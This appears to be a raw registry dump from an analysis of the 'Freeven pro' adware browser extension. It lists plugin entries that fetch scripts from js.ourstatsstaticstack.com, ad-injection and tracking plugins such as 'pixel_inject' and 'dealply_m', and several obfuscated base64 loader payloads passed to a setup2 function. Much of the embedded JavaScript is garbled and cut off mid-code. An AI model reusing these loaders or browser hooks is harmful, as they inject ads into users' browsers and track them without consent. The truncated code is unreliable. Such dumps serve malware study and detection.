"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDE3MDc4NDMwMzFlMDUxMzJmMWMxNjU4NGI0MTQ5MDIwNTE3MGE1NDU1NTUxODRmMDgxODE0MDExMDFkNTQxMzFmMDcwNDQ1MTIxMTFmMGM1NTEwMTAxNzBhMTkxMjExMTMxZTBlNTQxYjEyNTQwOTE5MDIxNDAwMWYxNjRjMDIxOTBlMDMzYzI1MzEzOTI4M2UzMjM4MzgzODI3M2YzYzI1M2YyOTM1MmUyNDM1MjYzZTMxMjkyZjMzM2UyMjJlMmUzYzU4NDI3MDczNTMwOTFmMWUwMTEwMmYxYzE2NTg0YjQxNDkwMjA1MTcwYTFkNDA1NTVlMDgzNDA5MDMwNjE4MDQwOTI1MTgwZjBkMDU1ZjE3MTYxZDE5MWUxZjRmMDgwNTFjNGMxOTFjMWYxODVlMGIwYTFjMTAxMDE5MWMxMzBhMDU0ZjAxMTk0ZTAwMTIwZjE0MTQxNDBkNTYwOTAzMDcwODMxMjUyNTMyMzMyNDM5MjIzMTMzMmEzZjI4MmUyNDMzM2UzNDJkM2UyYjNlMjUyMjM0MjkzNTM4MjcyNTMxNTg1NjdiNjg0OTFhMWQxNjFkMDcxNDMzMTU0MzUxNGE0MjU0NGY2NDA3', 'zzqakjqczn'); }"
[HKCU\Software\Freeven pro\Plugins\7]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/7.js"
[HKCU\Software\Freeven pro\Plugins\44]
"Name" = "IEMisc"
[HKCU\Software\Freeven pro\Plugins\233]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/233.js"
[HKCU\Software\Freeven pro\Plugins\380]
"Version" = "1"
[HKCU\Software\Freeven pro\Plugins\375]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/375.js"
[HKCU\Software\Freeven pro\Manifest]
"ModeType" = "production"
[HKCU\Software\Freeven pro\Plugins\35]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\Freeven pro\Plugins\102]
"Name" = "dealply_m"
[HKCU\Software\Freeven pro\Manifest]
"UninstallerOfferUrl" = "NA"
[HKCU\Software\Freeven pro\Plugins\246]
"Version" = "17"
[HKCU\Software\Freeven pro\Plugins\38]
"Version" = "4"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Freeven pro\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){6"
[HKCU\Software\Freeven pro\Plugins\230]
"Name" = "revizer_ws_dynamic_b2b_2_m"
[HKCU\Software\Freeven pro\Plugins\233]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDE2NzdiNGMxZDEwMTIxZTM2MDcxNjRmNDg0ZTU3MGMxMjFhMTM0ZjU1NDIxMzFkMDcxMjRiMGY0ZDE0MTEwYzFmMGYxYzBjMDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNWIwZTE1NGM0ZjdmNzM0ZjFhMWEwMTE0MTUzYjExMTk1ODU3NTI0YzFkMTAxMjFlMTA0ZjU1NDIxMzFkMDcxMjRiMGY0ZDE0MTEwYzFmMGYxYzBjMDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNWIwZTE1NGM0ZjdmNzM0ZjAyMDIwMDAzMGYwMDJhMTE1ODU3NTI1YzQ2NTc0YTY0NDM1NTVhNGQ1MDE4MTAxNjEyMDcwMDE0MTY0ZjQ4NGUyZTQ2MDcwYTEwNTcyNzQxNzg0ZTU1NDQ0NjRjMGExYjE2MDQxYzBiM2YzNzQ0NTQ0MzU3MGQwNDFjMGExYTEzNDgzMTExMDMwMDVjNDU1ZTQ1MWM1NzVlNTY0NTVhNTA1MjE1NTU0MzE2MWIwMTE5MTMxZTFhMGIwNzNiMTUxYjAxMWMxZTRhNDg0ZTUyM2IzOTJkMzEzYTI5M2UyMDI3MzEyMTM0MzEyNjJkMmUyODNjMmEzMDIwMzkzZDM2MzcyNTI0MzYzMTJhNDM0YTRlNDQxNDFlMDkxZDAwMWIwNTBiMGI0NDRmNWE0YTJkMzEzNjM2MjkzZDMwMjczMzI5MzczYzJhMjUzNjNlM2MzYjNiMjAzNzMxMmE0MzFiNTU0MTdmMDc=', 'zmrnudfncu'); }"
[HKCU\Software\Freeven pro\Plugins\46]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\91]
"JavaScript" = "(function(M){window.__loaderIsRunning__=false;var A=[].slice;var z={};var a=function(at){if(typeof at==string&&typeof at.trim==function){return at.trim();}return at==null?:at.toString().replace(/^\s /,).replace(/\s $/,);};function f(at){var au=z[at]={},av,aw;at=at.split(/\s /);for(av=0,aw=at.length;av
[HKCU\Software\Freeven pro\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHttp-6"
[HKCU\Software\Freeven pro\Plugins\380]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWE3Mzc4NDcwMTE3MWUxNjJkMGEwZDViNGI0NTRiMGIxZTEyMDg0MjRlNTYxMjAxMDc0ZDBkMDkwYjExMDYxNzAyMDAxYjE1NDQwNTE3MTU0ZTFhMTI0YTA4NGQwMDE1NDcyNzNlMGEwMzA2MzYwZjA1MDUxOTBjMGUwYjJlM2E1NDAwMDk0NDU0NzI2ODViMTkxMTFkMTMxOTMzMGExNDQzNDM1MTQ3MDExNzFlMTYwYjQyNGU1NjE1NTcwODViMGI1MjA5NDE0ZjBhMDIwOTQ3MGIxZDA1MWMxNjRmMTcxNDExNDYwMDA5NDkxOTU2MGIwYTRlM2EzNjEwMTgwNTI3MTQwZTFhMTAxMTA2MTEzNTM5NDUxYjAyNWI1ZDZmNjA0MTFhMGEwZDFmMDgxNzM4MDE0YjU5NGE1NTQwNDg0ZDczNTE0NTQ5NDM0ODBmMTYxNDA4MTcxNDJmM2E0MTUwNDY1YTBmMDgxNzE1MGExZTRkMzUzOTE2MGMwNzI2MTgwNzAwMDAzNTM5NDU1ZjNlMjYzMjM3MjYzMDM5MzQzMTNjMjQyYjJlMmMyNzMwM2UyNzM0MzQyNDJiMmUzMDNhMjYzODM5MzEzYzNlMjY1NjVlMWUwYTA0MDIxNzBmNGYyNjJlMGIxZDA1MzUxMDFkMGEwODI2MmU1ODRlM2MzNTI1MmEzNzMyMmEyMzJjMmQyNjM4MzkyZTNkMzMzMDM3MmMyYzMxMzUzOTVmNDMxNjEwMWYwMTA2MTQ0NDM5MjcxNjE1MWYyZTA3MWIzYzM1NWI1ZjI3M2UzYTIzMmEzYTMwMzgyZjNjM2QzMzI2MzMzNzI2MzQzOTIzMmEyNzNlNWU0YTEyMDAwZDBlMDkwZjU2M2UyNjFmMTEwZjNjMDkwYjA4MjczZTQ0NTYzYTM2MjAzODI5MmIyYjMzMzAzNTIwM2IzYzI5MjczNTI4M2UzMDM1M2EzNjQ0NTExF6"
[HKCU\Software\Freeven pro\Manifest]
"PluginsManifestVersion" = "103"
[HKCU\Software\Freeven pro\Plugins\37]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/37.js"
[HKCU\Software\Freeven pro\Plugins\226]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\380]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/380.js"
[HKCU\Software\Freeven pro\Plugins\375]
"Name" = "Dealply_tourist_widget_m"
[HKCU\Software\Freeven pro\Plugins\221]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\14]
"Version" = "11"
[HKCU\Software\Freeven pro\Plugins\42]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/42.js"
[HKCU\Software\Freeven pro\Plugins\38]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/38.js"
[HKCU\Software\Freeven pro\Plugins\334]
"Version" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Freeven pro\Plugins\354]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/354.js"
[HKCU\Software\Freeven pro\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\Freeven pro\Plugins\35]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/35.js"
[HKCU\Software\Freeven pro\Manifest]
"SetNewTab" = "false"
"Name" = "Freeven pro"
[HKCU\Software\Freeven pro\Plugins\253]
"Version" = "2"
[HKCU\Software\Freeven pro\Plugins\281]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGE2YjdhNWIwMDE3MTAxMTJkMTExZDQzNDk1OTRhMGIxMDE1MDg1OTVlNGUxMDE1MDMwNzAxMDAxNDEwNWYwMjFjMTQ0NzAyMDAzMjFkMTEwNzA0NWMxZTBkMTczMDAwMWY1YzAxMDgxNzQ0NTk1MjU0NTM0OTQ1MTIwODE3NDQzNzNjMjczMzM3MzAyMjMzM2EzZDJkMzEzYjI0MjAzNzM0MmYzNzNjMmMzYzM3MzQzYTNjMzgyNTJjMjY0ZTAyMTQxMTM2MDIxYzA0NGUyNjM3MjAzNjJlMmIzMDIzMjgzNzNjM2EzYzI1MzEyODNjM2YyMDNlM2MzNzNjNDY0ZDcyNmE1MzExMWYwYzBmMGEwYTI4MWM0MTRiNDE0MTQxNTk2OTE5', 'qasyhcdaxc'); }"
[HKCU\Software\Freeven pro\Plugins\94]
"Version" = "2"
[HKCU\Software\Freeven pro\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64"
[HKCU\Software\Freeven pro\Plugins\221]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/221.js"
[HKCU\Software\Freeven pro\Plugins\3]
"Version" = "2"
"Name" = "ie8_fix_2"
[HKCU\Software\Freeven pro\Plugins\184]
"Name" = "noproblemppc_m"
[HKCU\Software\Freeven pro\Plugins\13]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/13.js"
[HKCU\Software\Freeven pro\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""
[HKCU\Software\Freeven pro\Plugins\220]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/220.js"
[HKCU\Software\Freeven pro\Plugins\184]
"Version" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Freeven pro\Plugins\91]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/91.js"
[HKCU\Software\Freeven pro\Plugins\44]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/44.js"
[HKCU\Software\Freeven pro\Code]
"NewTabJavaScript" = ""
[HKCU\Software\Freeven pro\Plugins\230]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM3YzY3NDMwMDFlMWUwODNkMWYxNDU0NTQ0MTRhMDIxZTBjMTg1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDA2MTUxYzFhMTkyZDFhMDE1YTRjNGU0MzAwMWUxZTA4MWI1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDFlMGQxZDBkMDMxNjIxMDk1YTRjNGU1MzViNWE0NjcyNDg0ZDU4NTY0YzE3MGQxODFlMTEwYjBjMTQ1NDU0NDEzMzQ4MGIxYzFiNGYyNTVhNjQ0MTQ4NGE0YTVhMDEwMzE0MWYwMDA0MjIzOTQ4NDI0ODRmMGYxZjAwMDUwNzFkNDQyNzFhMWIwMjQ3NTk1MTU4MTI1YjQ4NWM1YjU4NGI0ZTFhNDg0ZDFhMGQwYTAxMTEwNTA2MDQxYTM1MTkwZDBhMDQxYzUxNTQ0MTRmMzUzNTNiM2EyMjJiMjUzYzI4MmMyZjM4MjcyZDM1MmMzMzIwMjUyZDJlMzUyYjNkMmYyNzNmMmEzZTM3NGQ0NjU4NGYwYzFjMTIwMTBmMDYwYjA3MWQ0ZjU3NTg1MTMxM2UyYjM4MjUyYjNiM2YzMTMyMmIzMzM3MmIzYTI4MzcyMzM5M2IyYjNlMzc0ZDE3NDM0YTY3MDU=', 'xvnahjjxhm'); }"
[HKCU\Software\Freeven pro\Plugins\200]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/200.js"
[HKCU\Software\Freeven pro\Plugins\253]
"Name" = "pixel_inject"
[HKCU\Software\Freeven pro\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:http://resources.crossrider.com,staging:http://staging-app.crossrider.com},update:/apps/{appId}/resources/meta/{lastVersion}},env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:(appAPI.internal.debug.isDebugMode()&&appAPI.internal.db.get(debug_resources_path))},w=o(meta)||{},g=o(remote_resources)||{remoteId:0},t=o(queue)||{},B=o(lastVersion)||0,A,s;appAPI.resources={init:function(){if(C.isDebug){h();}else{l(function(D){if(D){k();}else{h();}});}},isReady:function(D){s=D;if(A){h();}},get:function(D){if(typeof jQuery!==undefined){D=jQuery.trim(D);}return b(D,string);},includeCSS:function(G,F){if(typeof jQuery!==undefined){G=jQuery.trim(G);}var E=b6"
[HKCU\Software\Freeven pro\Plugins\226]
"Name" = "set_campaign_id_m"
[HKCU\Software\Freeven pro\Plugins\45]
"Name" = "IEOnRequest"
[HKCU\Software\Freeven pro\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI3ZDc5NTUxMjA1MGQxYzI0MDgxNTU1NGE1NzU4MTkwZDE4MDE0MDU2NTgxMzEzMTQ1ZjBmMDUwMjFiMWQxMzVlMTQxNTFjNTYxZjEyMDgxMDA3MDQ1ODRiNDU0YzVhNDY0ZDRiNDI0NzQxNGY1ZTA5MWUxNDE2MTYxNjE0NTkxMDAyNDYxZjA0MTgxMDEzNGQyODI1MzIyYjIzMjIyOTJiM2UzNDMyMjgyZTNjMzQyNTNmMzczMzM1MzMyNTIyMmMyZTJlMzMzZDI4MmY1MTBmMWM0NDMzMmUzOTJiMzgyMzI0MjgzODNkMjkyMzI1MzgyNzIwMjgzNDMwMzQyOTJlMjU1YjViN2E3ZTU4MTkwZDE4MDEwOTJjMDUxYzU1NDA1MTViMDQwNTBlMDkwNDRhNTg1NTEyMWQwMjVmMGMxMDA0MTExMzFlNWYxYTAzMWM1NTBhMTQwMjFlMGEwNTU2NWQ0NTRmNGY0MDQ3NDU0ZjQ2NGY1OTVlMGEwYjEyMWMxODFiMTU1NzA2MDI0NTBhMDIxMjFlMWU0YzI2MzMzMjI4MzYyNDIzMjUzMzM1M2MzZTJlM2YyMTIzMzUzOTNlMzQzZDMzMjIyZjNiMjgzOTMzMjUyZTVmMTkxYzQ3MjYyODMzMjUzNTIyMmEzZTM4M2UzYzI1MmYzNjJhMjEyNjIyMzAzNzNjMjgyZjU1NTY3YjcwNGUwMTE2MGMxMDE5MTkzMzE1NWI1NjUxNDg0YjQ0N2EwYQ==', 'ywpwzqylqz'); }"
[HKCU\Software\Freeven pro\Plugins\40]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/40.js"
[HKCU\Software\Freeven pro\Code]
"AppJavaScript" = ""
[HKCU\Software\Freeven pro\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Freeven pro\Plugins\233]
"Version" = "7"
"Name" = "revizer_p_dynamic_b2b_2_m"
[HKCU\Software\Freeven pro\Plugins\226]
"URL" = "http://js.ourstatsstaticstack.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"
[HKCU\Software\Freeven pro\Plugins\43]
"Version" = "5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Freeven pro\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\Freeven pro\Plugins\64]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/64.js"
[HKCU\Software\Freeven pro\Plugins\281]
"Name" = "ibario_tier3_pops_m"
[HKCU\Software\Freeven pro\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM3YTU0NTU1NTU1NDYxODFmMWEwODI1MDYxOTU3NGY0NDUyMDMxYTBjMDA0ZTVhNWExYzRhMTMxOTBjMGIxYTA3NWIxYzFiMDIxZjQ0MGQwYTEyMTI1YTFmMTQxMjExMTgwZDBhMTkwNDAxNWIxZjE3NGYwODA2MTkxZTFhMTAxOTQ4MDcwMjBmMWMyNzJmMmIzNjI3M2EzNzIzMzkyNzNjMzUyNjJhMzAyZDMwMzUyNTJhM2QzNDJiMjYyMDM3M2IzOTJmMzEyNzU2MTUwNTA1MjEwZDA0MDcwYjQ1MmYyYjM2MjczYTM3MjMzOTI3M2MzNTI2MmEzNDI1MzQyZjI1MmYzNTM1MmIyYTUzMWQwZDE0NTYzMTI3MzMyNjNhMjYyNjM2MzkyZjJiMmEyZjIxMjYzMDI3M2IzOTJmMzEyNzUyNTg3ZjU1NTU0NDUwNDkwNjBjMDQwNDA2MjAwNzA4NTI1MTRlNWExODAwMDEwNTA2NWU1ZjQ0MDcyNzEzMDYxNzA2MWYxNzJmMDIwMDFlMWY1YTAxMTkwNjA3MTQwNTQwMWIxZjE5NWExNjA3MDYxNjQ0MDQxOTA2MTUwNjE2MDcwZDAwMWY0MDEyMDM0YjE2MWQxNDBhMWUwZTAyNDUxMzA2MTEwNzJhM2IyZjI4M2MzNzIzMjcyNzNjMzEyMTIyMzQyYjIwMjQzMTNiMzEzMDIwMmYzODNiM2EyZjNkMzEyYTJhNDIxMTFiMWUyYzE5MDAxOTEwNDgzYjJmMjgzYzM3MjMyNzI3M2MzMTIxMjIzNDJmMjgyMDJiM2IzNDM4MjEyZjM0NDgxMDE5MTA0ODJhMmEyNzIyMjQzZDJiMjIzZDMxMzAyNzNiMjUzODJiMmEyZjNkMzEyYTJhNDY1YzYxNGU1ODUwNTQ1NzA1MTkxMTE3MDIwMDMxMTQ1NjRmNTU0NDU0NDI2MTEz', 'xptuuudpkn'); }"
[HKCU\Software\Freeven pro\Plugins\273]
"Version" = "6"
[HKCU\Software\Freeven pro\Plugins\223]
"Name" = "imonomy_m"
[HKCU\Software\Freeven pro\Plugins\39]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/39.js"
[HKCU\Software\Freeven pro\Plugins\44]
"Version" = "6"
[HKCU\Software\Freeven pro\Plugins\223]
"Version" = "9"
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/223.js"
[HKCU\Software\Freeven pro\Plugins\78]
"Name" = "CrossriderInfo"
[HKCU\Software\Freeven pro\Plugins\354]
"Name" = "categories"
[HKCU\Software\Freeven pro\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64"
[HKCU\Software\Freeven pro\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\Freeven pro\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO6"
[HKCU\Software\Freeven pro\Plugins\17]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/17.js"
[HKCU\Software\Freeven pro\Plugins\3]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/3.js"
[HKCU\Software\Freeven pro\Manifest]
"DisableIe" = "true"
[HKCU\Software\Freeven pro\Plugins\391]
"Name" = "50intext_new_m"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Freeven pro\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\Freeven pro\Plugins\7]
"Name" = "hooks"
[HKCU\Software\Freeven pro\Plugins\242]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Freeven pro\Plugins\390]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2ZDY4NWEwYzFmMTMxNTNiMDMxYTQ1NWI1ODQ2MDMxMzExMWU0YjU5NDgwMjFjMGEwODA2MDYwNjE0NWIwNjRmMTkwZjBhMGEwNDA3MTkxMjQ5MGYxZDEwNDQxNDEwMGM1ZTFlNTc1ODQwNTYwOTAyNGEzMTJlMzUzNTJlMmIzNzM5MmUyMTJiMjMyOTIyMzkyYzIxMjUyMzIwMmEyZTI1MzIyMzI3MmQyZjM4M2E0MTFkNTgwZDEyNDcxNDAyMDM1ODVjNDM0ZjUyNDcxZDFjMWY1YTNhMzEzMjI0MjgzMjJiMzYyMjIzMjAzYzJlMzczNzMxMjcyYTJhMmEyMDMxMmU1NDRiNmI3MTQ2MDMxMzExMWUwMjIzMTUwZDVhNWU0YjQ1MGQxYTA1MDYxNDViNTc0YjA4MDMwYjBkMTAxNTBmMDQ1NTA1NDUwNjBlMGYxYzE3MGUwOTFjNGEwNTAyMTE0MTAyMDMwNTRlMTA1NDUyNWY1NzBjMTQ1OTM4M2UzYjM2MjQzNDM2M2MzODMyMjIzMzI3MjEzMzMzMjAyMDM1MzMyMzNlMmIzMTI5MzgyYzJhMmUyOTQ4MGQ1NjBlMTg1ODE1MDcxNTRiNTU1MzQxNTE0ZDAyMWQxYTRjMjkzODIyMmEyYjM4MzQzNzI3MzUzMzM1M2UzOTM0M2IzODJiMmYzYzMzMzgzZTVhNDg2MTZlNDcxZTFkMDMwMDA4MTYyZDBmNDU1ZjRlNDI0ZjU3NmIwNQ==', 'vgaxdkgenq'); }"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Freeven pro\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\Freeven pro\Plugins\9]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/9.js"
[HKCU\Software\Freeven pro\Plugins\193]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MDIwYTRhNDk0MTQ5MTIxMjA0MWQ0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTFiMTUxZjBhMTUyNTFmMWM0NDUyNTM0MzAzMGUxMjAwMWU0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTAzMGQxZTFkMGYxZTI0MTQ0NDUyNTM1MDUyNDk0YTdhNGQ1MDQ2NDg1MTE3MGUwODEyMTkwZTExMGE0YTQ5NDEzMDU4MDcxNDFlNTIzYjQ0Nzk0MTRiNWE0NjUyMDQxZTBhMDExZDA0MjEyOTQ0NGE0ZDUyMTEwMTFkMDUwNDBkNDgyZjFmMDYxYzU5NDQ1MTViMDI1NzQwNWY0NDQ2NTU1MzFhNGI1ZDE2MDUwZjFjMGYxYjFiMDQxOTI1MTUwNTBmMTkwMjRmNDk0MTRjMjUzOTMzM2YzZjM1M2IyMTI4MmYzZjM0MmYyODI4MzIyZDNkMjUyZTNlMzkyMzM4MzIzOTIxMzczZTM0NWQ0YTUwNGExMTAyMGMxYzBmMDUxYjBiMTU0YTRhNDY0ZjJjM2UyODI4MjkyMzNlMjIyZjJjMzYzMzM0M2IzNjIwMzIzZTI3MjUzNjNlMzQ1ZDFiNGI0ZjdhMWI=', 'fhsakzfpmp'); }"
[HKCU\Software\Freeven pro\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
